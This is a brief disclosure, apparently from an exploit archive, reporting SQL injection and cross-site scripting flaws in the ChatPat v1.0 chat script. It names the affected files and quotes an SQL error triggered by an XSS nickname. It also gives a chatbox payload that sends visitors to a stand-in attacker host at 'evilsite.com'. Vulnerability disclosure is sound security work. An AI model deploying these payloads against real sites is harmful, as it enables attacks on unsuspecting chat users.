ChatPat v1.0 is vulnerable to SQL injection and XSS.
3434d4266bd55d6638a1628f378bff2d4577ee000f32cf4cddf748821ea1cce8
ChatPat v1.0
Homepage:
https://calendarscripts.info/download-3.html
Description:
An online chat room that lets users chat with each other.
Effected files:
fastchat.php
fastshow.php
The nickname input form doesn't sanatize user input before it adds it to the db. In turn this can cause SQL query errors such as:
UPDATE cp_users SET lastaction=NOW() WHERE nick='<BODY BACKGROUND="javascript:alert('XSS')">'
You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'XSS')">'' at line 3
XSS Vuln by submitting malicious text in the chatbox:
<IMG SRC=javascript:window.location('https://www.evilsite.com/badcode')>